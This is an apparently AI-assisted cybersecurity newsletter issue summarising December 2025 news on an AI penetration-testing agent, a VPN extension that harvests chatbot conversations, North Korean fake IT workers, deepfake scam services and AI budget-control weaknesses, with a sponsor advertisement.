PRESENTED BY

Cyber AI Chronicle
By Simon Ganiere · 21st December 2025
Welcome back!
Stanford researchers have achieved a breakthrough in autonomous cybersecurity testing, with their ARTEMIS agent securing second place overall against human professionals in live enterprise network penetration testing. The AI system discovered 9 valid vulnerabilities while outperforming 90% of its human competitors at a fraction of the cost.
With ARTEMIS operating at just $18 per hour compared to the $60+ hourly rate of professional pen testers, could we be witnessing the dawn of continuous, AI-powered security assessments that fundamentally reshape how organizations approach vulnerability management?
In today's AI recap:
The AI Pen Tester
What you need to know: In a landmark Stanford University study, a new AI agent named ARTEMIS outperformed 9 out of 10 human cybersecurity professionals in a live penetration test of an enterprise network.
Why is it relevant?:
In the experiment, ARTEMIS placed second overall, discovering 9 valid vulnerabilities and outperforming 9 of 10 human participants.
The agent excels at systematic enumeration and parallel exploitation, allowing it to probe multiple targets simultaneously—a task where human professionals are limited.
While still struggling with GUI-based tasks, one ARTEMIS variant operates at just $18 per hour, making it a cost-competitive alternative to professional penetration testers who average over $60 per hour.
Bottom line: Autonomous agents like ARTEMIS are quickly evolving into practical tools that can augment security teams by running continuous, scalable tests. This signals a major shift in offensive security, where AI will likely become an essential layer for both attackers and defenders.
Build smarter, not harder: meet Lindy
Tired of AI that just talks? Lindy actually executes.
Describe your task in plain English, and Lindy handles it—from building booking platforms to managing leads and sending team updates.
AI employees that work 24/7:
Sales automation
Customer support
Operations management
Focus on what matters. Let Lindy handle the rest.
The AI Chat Spy
What you need to know: A Google "Featured" VPN extension used by over eight million people has been caught silently logging user conversations from major AI chatbots and selling the data. Research from Koi Security details how Urban VPN and its affiliates capture everything from personal dilemmas to proprietary code.
Why is it relevant?:
The extension injects platform-specific scripts into sites like ChatGPT and Claude that override native browser functions to intercept and exfiltrate all prompts and responses.
This data harvesting was added via a silent update in July 2025, meaning millions installed the tool for privacy protection before its monitoring capabilities were activated.
Despite violating policies against selling user data to data brokers, Urban VPN received a "Featured" badge from Google's Chrome Web Store, giving users a false sense of security.
Bottom line: This incident highlights the growing risk of supply chain-style attacks within the browser itself, turning privacy tools into data harvesters. As employees increasingly use AI chatbots for work, vetting browser extensions becomes a critical endpoint security control.
North Korea's AI Workforce
What you need to know: North Korean state actors stole a record-breaking $2 billion in cryptocurrency in 2025, according to a new report. Their primary method involves placing fake IT workers inside crypto firms and major tech companies by using AI-generated resumes and deepfake video interviews.
Why is it relevant?:
Since April 2024, Amazon detected and blocked over 1,800 suspected North Korean operatives from gaining employment, highlighting the massive scale of this infiltration campaign.
Attackers use AI tools to draft convincing resumes and social media profiles and increasingly use deepfakes during video interviews to impersonate real software engineers and bypass initial screening.
Once hired, these operatives act as insiders to steal proprietary source code, siphon funds, and establish long-term persistence within corporate networks for future operations.
Bottom line: This marks a significant shift from traditional external attacks to AI-enhanced social engineering that creates insider threats at scale. Organizations must now strengthen identity verification during hiring and continuously monitor for anomalous technical behavior to counter this growing risk.
Follow Project Overwatch on LinkedIn. Daily summary of Cyber AI news and more!
The Deepfake Scam Economy
What you need to know: An investigation has uncovered 'Haotian,' a potent Deepfake-as-a-Service platform operating on Telegram that is actively marketed to 'pig butchering' and romance scammers, complete with its own criminal payment infrastructure.
Why is it relevant?:
Haotian operates like a legitimate tech startup, offering tiered subscriptions, technical support, and even on-site installation, processing at least $3.9 million in payments through cryptocurrency wallets.
The tool is designed to overcome skepticism, with developers claiming it can seamlessly bypass common detection methods like asking a person to wave their hands in front of their face during a video call.
This platform is a prime example of the growing Deepfake-as-a-Service trend, which lowers the technical barrier for criminals to execute highly convincing and scalable social engineering attacks.
Bottom line: The emergence of user-friendly and powerful AI scam tools requires security leaders to update threat models beyond text-based phishing. Defenses and employee training must now prepare for a reality where seeing is no longer believing.
The AI Budget Burn
What you need to know: A report from security firm Ox Security discovered that weak default configurations in AI platforms like Cursor and AWS Bedrock can allow attackers or employees to drain enterprise budgets, potentially costing millions in a matter of hours.
Why is it relevant?:
The core vulnerability allows any non-admin users to modify team-wide spending limits without requiring admin approval or triggering notifications.
Attackers can exploit this with malicious deep links that, when clicked, trick the user's system into silently increasing budget caps and running infinite, high-cost requests.
Leaked or stolen API tokens offer a more direct attack vector, giving criminals immediate access to run their own expensive AI workloads on a company's account.
Bottom line: This exposes a systemic issue where some AI platforms prioritize rapid access over secure-by-default financial controls. Security teams must proactively audit and harden the configurations of all new AI tools rather than trusting vendor defaults.
The Shortlist
Palo Alto Networks expanded its partnership with Google Cloud in a multibillion-dollar deal to help secure AI initiatives, which includes using Google's Vertex AI and Gemini models to power its security copilots.
Mandiant demonstrated how a financial services chatbot could be manipulated with simple prompts to approve a 200-month loan at 0% APR, bypassing its safety filters during a red team exercise.
Militant groups are experimenting with AI to create propaganda, deepfakes, and refine cyberattacks, with organizations like the Islamic State group reportedly holding training workshops to help supporters learn to use the technology.
Wisdom of the Week
Stop trying to be understood by everyone.
AI Influence Level
Level 4 - Al Created, Human Basic Idea / The whole newsletter is generated via a n8n workflow based on publicly available RSS feeds. Human-in-the-loop to review the selected articles and subjects.
Reference: AI Influence Level from Daniel Miessler
Till next time!
Project Overwatch is a cutting-edge newsletter at the intersection of cybersecurity, AI, technology, and resilience, designed to navigate the complexities of our rapidly evolving digital landscape. It delivers insightful analysis and actionable intelligence, empowering you to stay ahead in a world where staying informed is not just an option, but a necessity.
